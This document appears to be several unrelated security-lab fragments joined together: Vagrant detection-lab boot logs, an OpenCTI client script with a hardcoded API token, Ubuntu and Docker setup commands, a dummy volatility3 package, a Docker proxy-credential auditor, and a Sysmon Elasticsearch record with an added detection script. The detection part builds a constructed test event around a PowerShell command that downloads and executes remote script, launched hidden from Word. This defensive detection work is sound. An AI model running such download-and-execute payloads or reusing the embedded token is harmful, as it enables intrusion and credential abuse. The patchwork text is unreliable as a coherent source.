vagrant up dc wef win10
Bringing machine 'dc' up with 'virtualbox' provider...
Bringing machine 'wef' up with 'virtualbox' provider...
Bringing machine 'win10' up with 'virtualbox' provider...
==> dc: Clearing any previously set forwarded ports...
==> dc: Fixed port collision for 22 => 2222. Now on port 2200.
==> dc: Clearing any previously set network interfaces...
==> dc: Preparing network interfaces based on configuration...
    dc: Adapter 1: nat
    dc: Adapter 2: hostonly

$ vagrant up logger
Bringing machine 'logger' up with 'virtualbox' provider...
==> logger: Importing base box 'bento/ubuntu-18.04'...
==> logger: Matching MAC address for NAT networking...
==> logger: Checking if box 'bento/ubuntu-18.04' version '202002.14.0' is up to date...
==> logger: Setting the name of the VM: logger
==> logger: Clearing any previously set network interfaces...
==> logger: Preparing network interfaces based on configuration...
    logger: Adapter 1: nat

Bringing machine 'logger' up with 'virtualbox' provider...
==> logger: Box 'bento/ubuntu-18.04' could not be found. Attempting to find and install...
    logger: Box Provider: virtualbox
    logger: Box Version: >= 0
==> logger: Loading metadata for box 'bento/ubuntu-18.04'
    logger: URL: https://vagrantcloud.com/bento/ubuntu-18.04
==> logger: Adding box 'bento/ubuntu-18.04' (v202002.14.0) for provider: virtualbox
    logger: Downloading: https://vagrantcloud.com/bento/boxes/ubuntu-18.04/versions/202002.14.0/providers/virtualbox.box
    logger: Progress: 0% (Rate: 0*/s, Estimated time remaining: --:--:--)

# coding: utf-8
import datetime
from dateutil.parser import parse
from pprint import pprint
from pycti import OpenCTIApiClient

# OpenCTI endpoint and API token for the client. A token committed to a gist is a
# leaked credential: for anything other than a throwaway demo instance, read it
# from the environment or a secrets store instead of hardcoding it here.
api_url = "https://demo.opencti.io"
api_token = "609caced-7610-4c84-80b4-f3a380d1939b"
opencti_api_client = OpenCTIApiClient(api_url, api_token)

# Fresh Ubuntu 18.04 with VirtualBox 6.1.2
# Download https://ubuntu.com/download/desktop/thank-you?version=18.04.3&architecture=amd64 - ubuntu-18.04.3-desktop-amd64.iso
## Config
### 4 vCPU
### 4 GB RAM
### 64 MB video memory
### 50 GB HDD
##
### Boot CD

# Drop packages nothing depends on any more, then purge every installed kernel
# image except the running one (uname -r with its "-generic" style suffix stripped)
apt autoremove -y
apt purge $( dpkg --list | grep -P -o "linux-image-\d\S+" | grep -v $(uname -r | grep -P -o ".+\d") )
apt update && apt upgrade -y
# Remove any distro-packaged Docker before installing from Docker's own repository
apt remove docker docker-engine docker.io containerd runc
apt install \
    apt-transport-https \
    ca-certificates \
    curl \

import setuptools

setuptools.setup(
    name="volatility3",
    version="0.0.2",
    author="volatilityfoundation",
    author_email="info@volatilityfoundation.org",
    description="Volatility 3: The volatile memory extraction framework. DUMMY PACKAGE. DO NOT USE.",
    long_description="This is a dummy package. The official project website is available at https://github.com/volatilityfoundation/volatility3",
    url="https://github.com/volatilityfoundation/volatility3",

docker build \
    --build-arg http_proxy="$http_proxy" \
    --build-arg HTTP_PROXY="$http_proxy" \
    --build-arg https_proxy="$https_proxy" \
    --build-arg HTTPS_PROXY="$https_proxy" \
    --build-arg no_proxy="$no_proxy" \
    --build-arg NO_PROXY="$no_proxy" \
    -t tag:version .
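The proxy variables above are passed as build args, which is where credentials tend to leak: a corporate proxy URL often carries user:password@ userinfo, and any build arg outside Docker's predefined proxy set (HTTP_PROXY, http_proxy, HTTPS_PROXY, https_proxy, FTP_PROXY, ftp_proxy, NO_PROXY, no_proxy, ALL_PROXY, all_proxy) is recorded in the image metadata and shows up in `docker history`. The following is an added example, not part of the gist: it assembles the same `docker build` command line from an environment dictionary and audits the build args for both problems. The environment values and the NPM_TOKEN name used in the test are constructed.

```python
"""Audit `docker build --build-arg` values for credential leakage.

Added example, not part of the original gist. It relies on one documented
Docker behaviour: the predefined proxy build args are omitted from
`docker history`, every other build arg is persisted in the image metadata.
"""
from typing import Dict, List
from urllib.parse import urlsplit

# Docker's predefined proxy build args (both spellings of each).
PREDEFINED_PROXY_ARGS = frozenset(
    name
    for base in ("HTTP_PROXY", "HTTPS_PROXY", "FTP_PROXY", "NO_PROXY", "ALL_PROXY")
    for name in (base, base.lower())
)


def build_args_from_env(env: Dict[str, str]) -> Dict[str, str]:
    """Mirror the gist: copy each lowercase proxy variable into both spellings."""
    args: Dict[str, str] = {}
    for lower in ("http_proxy", "https_proxy", "no_proxy"):
        value = env.get(lower, "")
        args[lower] = value
        args[lower.upper()] = value
    return args


def docker_build_command(build_args: Dict[str, str], tag: str, context: str = ".") -> List[str]:
    """Return the argv for `docker build` with one --build-arg per entry."""
    cmd = ["docker", "build"]
    for name, value in build_args.items():
        cmd += ["--build-arg", f"{name}={value}"]
    return cmd + ["-t", tag, context]


def _split(url: str):
    # Proxy settings are often written without a scheme ("proxy:3128");
    # urlsplit needs one to parse the netloc, so supply a placeholder.
    return urlsplit(url if "://" in url else "http://" + url)


def has_embedded_credentials(url: str) -> bool:
    """True when the URL carries user:password@ userinfo."""
    if not url:
        return False
    parts = _split(url)
    return parts.username is not None or parts.password is not None


def redact(url: str) -> str:
    """Replace embedded userinfo so the URL is safe to print in build logs."""
    if not has_embedded_credentials(url):
        return url
    parts = _split(url)
    host = parts.hostname or ""
    if parts.port:
        host = f"{host}:{parts.port}"
    return parts._replace(netloc=f"***:***@{host}").geturl()


def audit_build_args(build_args: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify build args.

    persisted_in_history: names Docker records in image metadata (not predefined).
    credentials_in_proxy: predefined proxy args whose value embeds credentials;
    they stay out of `docker history` but are still visible to every RUN step.
    """
    report: Dict[str, List[str]] = {"persisted_in_history": [], "credentials_in_proxy": []}
    for name, value in build_args.items():
        if name not in PREDEFINED_PROXY_ARGS:
            report["persisted_in_history"].append(name)
        elif has_embedded_credentials(value):
            report["credentials_in_proxy"].append(name)
    return report


# Constructed sample environment (hypothetical proxy host and credentials).
SAMPLE_ENV = {
    "http_proxy": "http://alice:s3cret@proxy.corp.example:3128",
    "https_proxy": "http://alice:s3cret@proxy.corp.example:3128",
    "no_proxy": "localhost,127.0.0.1",
}

if __name__ == "__main__":
    args = build_args_from_env(SAMPLE_ENV)
    print(" ".join(redact(a) for a in docker_build_command(args, "tag:version")))
    print(audit_build_args(dict(args, NPM_TOKEN="npm_abc123")))
```

The usual fix for the second category is to keep credentials out of the proxy URL entirely (authenticate the build host to the proxy some other way); for the first, use BuildKit secret mounts rather than build args for anything sensitive.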

{
  "_index": "sysmon-2017.11.24",
  "_type": "sysmon_process",
  "_id": "AV_v1-kZAnLqT_pijW1u",
  "_score": 1,
  "_source": {
    "Task": 1,
    "ParentImage": "C:\\Windows\\System32\\cmd.exe",
    "LogonGuid": "{6B166207-852C-5A18-0000-00200D6D0100}",
    "EventType": "INFO",
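A record in this shape is what a detection job reads back out of Elasticsearch: each hit's `_source` carries the Sysmon fields, and `"Task": 1` is the process-creation event. The following is an added example, not part of the gist, that runs two simple process-creation detections over such hits: an Office application spawning a shell, and PowerShell launched with an encoded command, which it decodes so the finding shows the actual script. The field names beyond those visible above (Image, CommandLine, User) follow Sysmon's Event ID 1 schema, and the sample hits, the LAB user and the example.invalid URL are constructed.

```python
"""Process-creation detections over Sysmon hits in the layout shown above.

Added example, not from the original gist. Assumes "Task": 1 marks a Sysmon
process-creation event, as in the page's record; the sample hits are constructed.
"""
import base64
import binascii
import re
from typing import List, Optional, Tuple

PROCESS_CREATE_TASK = 1

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...),
# followed by a base64 blob; require a minimum length to skip stray short tokens.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script of an -EncodedCommand argument, or None."""
    match = ENCODED_RE.search(command_line or "")
    if not match:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64.
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def detect(hit: dict) -> List[Tuple[str, str]]:
    """Return (rule_name, detail) findings for one Elasticsearch hit."""
    src = hit.get("_source", {})
    if src.get("Task") != PROCESS_CREATE_TASK:
        return []  # only process-creation events carry a parent/child pair
    parent = basename(src.get("ParentImage", ""))
    child = basename(src.get("Image", ""))
    findings: List[Tuple[str, str]] = []
    if parent in OFFICE_APPS and child in SHELLS:
        findings.append(("office_spawned_shell", f"{parent} -> {child}"))
    if child in POWERSHELL:
        decoded = decode_encoded_command(src.get("CommandLine", ""))
        if decoded is not None:
            findings.append(("encoded_powershell", decoded))
    return findings


def scan(hits: List[dict]) -> dict:
    """Map each hit's _id to its findings (empty list when nothing fired)."""
    return {hit["_id"]: detect(hit) for hit in hits}


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed attacker script used to build the sample hit below.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"

# Constructed hits in the page's _index/_type/_id/_source layout.
SAMPLE_HITS = [
    {"_index": "sysmon-2017.11.24", "_type": "sysmon_process", "_id": "benign-1",
     "_source": {"Task": 1, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
                 "Image": "C:\\Windows\\System32\\ipconfig.exe",
                 "CommandLine": "ipconfig /all", "User": "LAB\\alice"}},
    {"_index": "sysmon-2017.11.24", "_type": "sysmon_process", "_id": "office-2",
     "_source": {"Task": 1,
                 "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
                 "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(PAYLOAD),
                 "User": "LAB\\alice"}},
    {"_index": "sysmon-2017.11.24", "_type": "sysmon_process", "_id": "netconn-3",
     "_source": {"Task": 3,  # a network-connection event, not a process create
                 "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "CommandLine": "powershell.exe -enc AAAAAAAAAAAAAAAAAAAA"}},
]

if __name__ == "__main__":
    for hit_id, findings in scan(SAMPLE_HITS).items():
        for rule, detail in findings:
            print(f"{hit_id}: {rule}: {detail}")
```

The encoded-command rule deliberately decodes rather than just matching on `-enc`: the decoded text is what an analyst needs to triage, and a blob that fails base64 or UTF-16LE decoding is left unflagged rather than reported as a false positive.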